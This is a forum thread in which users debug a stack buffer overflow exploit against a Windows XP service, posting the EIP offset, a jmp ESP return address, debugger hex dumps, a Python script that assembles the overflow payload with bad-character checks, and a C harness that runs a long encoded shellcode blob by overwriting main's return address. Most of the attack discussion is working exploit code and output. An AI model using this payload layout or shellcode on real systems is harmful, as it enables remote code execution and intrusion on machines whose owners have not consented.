Can you please tell me why jmp ECX won't work on XP? If not, what else should I do?
I didn't know what the OP might mean by that; I just tested my way and it ran. But what is jmp ECX, and what's the difference between Linux and Windows (just an area I can google)? Also, a jmp ECX will not work with Windows XP.
From XP SP3 to SP2 the only thing that should change is from 00400000 to another 00400000 if you used the code I posted. I would like to find out about this jmp ecx, as I'm not too familiar with that and probably won't be able to help you in that regard. If you can, please try it on some XP SP2 machine and tell me where I'm going wrong.
I'm new to this compared to the old fellow here, but is it EIP or EBP? The first NOPs, I mean the beginning of the shellcode, are being pointed to by ECX.
Subtract 4 until EIP doesn't have \x90 in it, and then add a pointer/jmp to the NOPs at the start of the shellcode (if using OllyDbg, look at the bottom left). Which machine did you try? I find that after 524 bytes EIP is overwritten.
Those addresses (post #7) look like the heap, not the stack; look higher: 0022E020
Can you please tell me why jmp ECX won't work on XP? If not, what else should I do?
I've got a working exploit for your source.
It is quite simple.
You also went in the right direction with your memory layout. But you should give your buffer a closer look. Check the registers again. Maybe you shouldn't jump to ECX but to some other register.
Tiocfaidh ár lá
Yes, ESP is pointing to the buffer. EIP is overwritten at 524 and ESP points at the 528th byte. I use the following code to test. I find the total available space for shellcode is 932 bytes (after ESP). But after running the following code I find EIP overwritten by a stack address, 0022EC3D. I have pasted part of the hex dump. I have even tested with a few other jmp esp addresses but am still not getting a result.
buffer = "A" * 524 #junk data
buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
buffer += "B" * 4 #esp nops
buffer += "C" * 928 #shellcode +nop
buffer += '\r\n'
print buffer
hex dump
------------------------------------------
0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC
I think EIP should contain the address of jmp esp. I have tried it with shellcode also but am not getting the desired results. Am I going wrong somewhere? Can you please suggest how I should proceed further?
Quoting the code and hex dump from the post above:
buffer = "A" * 524 #junk data
"But after running the following code I find EIP overwritten by a stack address 0022EC3D"
buffer += '\x5D\x38\x82\x7C' #jmp ESP address -> eip
buffer += "\x45\xec\x22\x00" # 0x0022EC45 little-endian: address of the first C byte in the dump above
buffer += "C" * 928 #shellcode + nop fill
buffer += '\r\n'
Regarding "zero bytes":
In the C programming language, and in many other programming languages, a string is a sequence of characters followed by a terminating null character. So for instance, if you had the string, "dog", it would be the following four bytes:
1: The ASCII code for d
2: The ASCII code for o
3: The ASCII code for g
4: The terminating null character (which is simply all bits zero)
If you were to copy this string, for instance by using the "strcpy" function, then "strcpy" will stop copying when it encounters the terminating null character. This is where the problem lies. If your shellcode contains a zero byte, then all string functions will stop reading at the zero byte. So if your shellcode contains a zero byte, you need to improvise somehow to get rid of it (that's of course assuming that your shellcode will be processed by a string-processing routine).
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
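The two posts above describe the same payload from two sides: the layout (524 bytes of junk, the 4-byte return address that lands in EIP, 4 bytes at ESP, then up to 928 bytes of shellcode) and the reason a 0x00 byte anywhere in it breaks things. The following is an added example in Python 3, my own code and not anything posted in this thread, that assembles that layout, refuses any return address or shellcode containing bytes that would truncate this particular request, and renders a dump in the same form as the one posted so the bytes around EIP can be compared against the debugger. The offset 524, the return address 0x7C82385D, the 928-byte limit and the stack base (computed from the dump, where the EIP bytes sit at 0x0022EC3C) come from the thread; the bad-character set (0x00 for the C string functions just described, 0x0A and 0x0D because the request is terminated with '\r\n') and the INT3 stand-in for real shellcode are my assumptions.

```python
import struct

# Values taken from the thread: EIP is overwritten at offset 524, ESP points
# 4 bytes past it, 928 bytes of space remain after ESP, and the jmp esp
# candidate used was 0x7C82385D (an assumption that it really is a jmp esp).
OFFSET_TO_EIP = 524
ESP_PAD = 4
MAX_SHELLCODE = 928
RET_ADDR = 0x7C82385D
# In the posted dump the four return-address bytes sit at 0x0022EC3C,
# so the buffer itself starts 524 bytes below that (derived, not measured).
STACK_BASE = 0x0022EC3C - OFFSET_TO_EIP

# Assumed bad characters for this target: 0x00 terminates every C string
# function, and the request ends with '\r\n', so a stray 0x0A/0x0D would
# end the line early and cut the payload short.
BADCHARS = b"\x00\x0a\x0d"


def find_badchars(data: bytes, badchars: bytes = BADCHARS) -> list:
    """Return a list of (offset, byte) for every bad character in data."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_payload(shellcode: bytes, ret_addr: int = RET_ADDR,
                  offset: int = OFFSET_TO_EIP, pad: int = ESP_PAD) -> bytes:
    """Assemble junk | EIP | pad | shellcode | NOP fill, rejecting bad chars."""
    if len(shellcode) > MAX_SHELLCODE:
        raise ValueError(f"shellcode is {len(shellcode)} bytes, limit is {MAX_SHELLCODE}")
    eip = struct.pack("<I", ret_addr)            # x86 is little-endian
    bad = find_badchars(eip)
    if bad:
        raise ValueError(f"return address contains bad chars at {bad}")
    bad = find_badchars(shellcode)
    if bad:
        raise ValueError(f"shellcode contains bad chars at {bad}")
    payload = b"A" * offset                      # junk up to the saved EIP
    payload += eip                               # overwrites EIP
    payload += b"\x90" * pad                     # real NOPs where ESP lands
    payload += shellcode
    payload += b"\x90" * (MAX_SHELLCODE - len(shellcode))  # fill to the limit
    return payload


def hexdump(data: bytes, base: int = 0, width: int = 8) -> list:
    """Render data like the debugger dump in the thread: address, hex, ASCII."""
    lines = []
    for i in range(0, len(data), width):
        chunk = data[i:i + width]
        hexpart = " ".join(f"{b:02X}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{base + i:08X} {hexpart:<{width * 3 - 1}} {asc}")
    return lines


if __name__ == "__main__":
    # Constructed stand-in for shellcode: INT3 breakpoints, so a debugger
    # attached to the target stops the moment control reaches ESP.
    sc = b"\xcc" * 16
    p = build_payload(sc)
    print(f"payload length {len(p)}, bytes at offset {OFFSET_TO_EIP}: "
          f"{p[OFFSET_TO_EIP:OFFSET_TO_EIP + 4].hex()}")
    # Dump the region around EIP with the addresses the post reported.
    start = OFFSET_TO_EIP - 8
    for line in hexdump(p[start:start + 40], base=STACK_BASE + start):
        print(line)
    # Shellcode with a NUL and a newline in it is rejected before it is sent.
    try:
        build_payload(b"\x31\xc0\x00\x0a")
    except ValueError as err:
        print("rejected:", err)
    # On the wire the request is p + b"\r\n"; the socket send is left out here.
```

The dump printed for the region around offset 524 should line up with the posted one: the 5D 38 82 7C bytes at 0x0022EC3C, then the four bytes at ESP, then the shellcode. If the debugger shows something else at those addresses, the offset or the assumption about what the target does with the buffer is wrong, not the shellcode.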
I have tested the shellcode using the following. It works as it should. I don't think a null byte is there.
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
/* shellcode bytes as posted */
char shellcode[]=
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\x6d\xc6\xd5\x42"
"\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\xfd\x3e\xc5\x36"
"\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\x6b\x0e\xea\x24"
"\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\xbe\x6b\x0e\x95"
"\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\xda\x23\x2b\x56"
"\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\x0e\x7c\x1a\x36"
"\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\xcb\x31\xc6\xed"
"\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\xda\x6b\xd5\x6d"
"\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\x04\xd2\x22\xbf"
"\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\x53\x6c\x79\xee"
"\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\xe3\x6c\xa3\x5c"
"\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\xd0\xc0\xfa\xd5"
"\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\x60\x76\xac\xf4"
"\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\xfc\xf9\x53\xea"
"\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\x0c\xda\x40\xed"
"\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\x2f\xc1\x68\x90"
"\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\x7b\x8c\x3c\x42"
"\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\xd4\x6e\x7f\xec"
"\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\x7a\x08\xd5\x6d"
"\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\x75\xb5\x2e\xe2"
"\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd";
int main ()
{
    int *ret;
    /* Assumes a 32-bit frame with no stack cookie, so that &ret + 2
       is the slot holding main()'s saved return address. */
    ret=(int *)&ret+2;
    /* strlen stops at the first 0x00, so a length shorter than the
       array would reveal a null byte inside the shellcode. */
    printf("Shellcode Length is : %d\n",strlen(shellcode));
    /* Overwrite the saved return address so that returning from main()
       jumps into the shellcode (needs an executable data segment). */
    (*ret)=(int)shellcode;
    return 0;
}
As there is no bad char, I don't know why it shouldn't work.
Could you please tell us what the exact problem is at the moment?
Tiocfaidh ár lá